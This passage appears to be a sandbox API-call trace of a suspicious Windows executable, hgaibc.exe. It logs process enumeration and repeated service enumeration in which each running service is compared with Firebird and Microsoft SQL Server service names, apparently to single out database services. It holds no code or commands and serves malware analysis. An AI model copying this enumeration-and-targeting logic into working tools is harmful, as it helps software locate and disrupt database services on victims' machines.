(lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0177.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0177.564] lstrlenW (lpString="Spooler") returned 7 [0177.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0177.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0177.564] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0177.564] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0177.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0177.590] lstrlenW (lpString="StateRepository") returned 15 [0177.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0177.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0177.590] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0177.590] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0177.590] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0177.590] lstrlenW (lpString="SysMain") returned 7 [0177.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0177.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0177.590] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0177.590] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0177.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0177.591] lstrlenW (lpString="SystemEventsBroker") returned 18 [0177.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0177.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0177.591] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0177.591] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0177.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0177.591] lstrlenW (lpString="Themes") returned 6 [0177.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0177.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0177.591] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0177.591] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0177.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0177.591] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0177.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0177.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0177.591] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0177.591] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0177.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fd308 | out: hHeap=0x6a0000) returned 1 [0177.591] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3f4 [0177.598] Process32FirstW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.598] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0177.599] lstrlenW (lpString="System") returned 6 [0177.599] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0177.600] lstrlenW (lpString="smss.exe") returned 8 [0177.600] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.601] lstrlenW (lpString="csrss.exe") returned 9 [0177.601] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0177.602] lstrlenW (lpString="wininit.exe") returned 11 [0177.602] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.603] lstrlenW (lpString="csrss.exe") returned 9 [0177.603] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0177.604] lstrlenW (lpString="winlogon.exe") returned 12 [0177.604] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0177.605] lstrlenW (lpString="services.exe") returned 12 [0177.605] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0177.606] lstrlenW (lpString="lsass.exe") returned 9 [0177.606] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0177.607] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0177.607] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0177.608] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0177.608] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.609] lstrlenW (lpString="svchost.exe") returned 11 [0177.609] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.610] lstrlenW (lpString="svchost.exe") returned 11 [0177.610] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0177.611] lstrlenW (lpString="dwm.exe") returned 7 [0177.611] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.612] lstrlenW (lpString="svchost.exe") returned 11 [0177.612] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.613] lstrlenW (lpString="svchost.exe") returned 11 [0177.613] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.614] lstrlenW (lpString="svchost.exe") returned 11 [0177.614] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.615] lstrlenW (lpString="svchost.exe") returned 11 [0177.615] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.616] lstrlenW (lpString="svchost.exe") returned 11 [0177.616] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.617] lstrlenW (lpString="svchost.exe") returned 11 [0177.617] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.618] lstrlenW (lpString="svchost.exe") returned 11 [0177.618] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.618] lstrlenW (lpString="svchost.exe") returned 11 [0177.619] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.619] lstrlenW (lpString="svchost.exe") returned 11 [0177.619] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.620] lstrlenW (lpString="svchost.exe") returned 11 [0177.620] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.621] lstrlenW (lpString="spoolsv.exe") returned 11 [0177.621] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.622] lstrlenW (lpString="svchost.exe") returned 11 [0177.622] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.623] lstrlenW (lpString="audiodg.exe") returned 11 [0177.623] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0177.624] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0177.624] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0177.625] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0177.625] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0177.626] lstrlenW (lpString="Memory Compression") returned 18 [0177.626] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0177.627] lstrlenW (lpString="sihost.exe") returned 10 [0177.627] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.634] lstrlenW (lpString="svchost.exe") returned 11 [0177.634] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0177.635] lstrlenW (lpString="msoia.exe") returned 9 [0177.635] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0177.636] lstrlenW (lpString="taskhostw.exe") returned 13 [0177.636] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.637] lstrlenW (lpString="explorer.exe") returned 12 [0177.637] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0177.638] lstrlenW (lpString="SearchUI.exe") returned 12 [0177.638] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0177.639] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0177.639] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0177.640] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0177.640] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.640] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0177.640] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0177.641] lstrlenW (lpString="hgaibc.exe") returned 10 [0177.641] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0177.642] lstrlenW (lpString="cmd.exe") returned 7 [0177.642] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0177.664] lstrlenW (lpString="conhost.exe") returned 11 [0177.664] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0177.665] lstrlenW (lpString="dllhost.exe") returned 11 [0177.665] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0177.666] lstrlenW (lpString="dllhost.exe") returned 11 [0177.666] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0177.667] lstrlenW (lpString="hgaibc.exe") returned 10 [0177.667] Process32NextW (in: hSnapshot=0x3f4, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0177.667] CloseHandle (hObject=0x3f4) returned 1 [0177.668] Sleep (dwMilliseconds=0x1f4) [0178.267] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c268 [0178.268] EnumServicesStatusExW (in: hSCManager=0x458c268, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0178.269] GetLastError () returned 0xea [0178.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x6fd308 [0178.269] EnumServicesStatusExW (in: hSCManager=0x458c268, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6fd308, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6fd308, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0178.270] CloseServiceHandle (hSCObject=0x458c268) returned 1 [0178.271] lstrlenW (lpString="Appinfo") returned 7 [0178.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0178.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0178.271] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0178.271] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0178.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0178.271] lstrlenW (lpString="AppXSvc") returned 7 [0178.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0178.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0178.271] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0178.271] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0178.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0178.271] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0178.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0178.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0178.271] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0178.272] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0178.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0178.272] lstrlenW (lpString="Audiosrv") returned 8 [0178.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0178.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0178.272] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0178.272] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0178.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0178.272] lstrlenW (lpString="BFE") returned 3 [0178.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0178.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0178.272] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0178.272] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0178.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0178.272] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0178.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0178.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0178.272] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0178.272] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0178.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0178.272] lstrlenW (lpString="CDPSvc") returned 6 [0178.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0178.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0178.272] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0178.272] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0178.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0178.273] lstrlenW (lpString="ClickToRunSvc") returned 13 [0178.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0178.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0178.273] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0178.273] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0178.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0178.273] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0178.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0178.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0178.273] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0178.273] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0178.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0178.273] lstrlenW (lpString="CryptSvc") returned 8 [0178.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0178.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0178.273] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0178.273] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0178.273] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0178.273] lstrlenW (lpString="DcomLaunch") returned 10 [0178.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0178.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 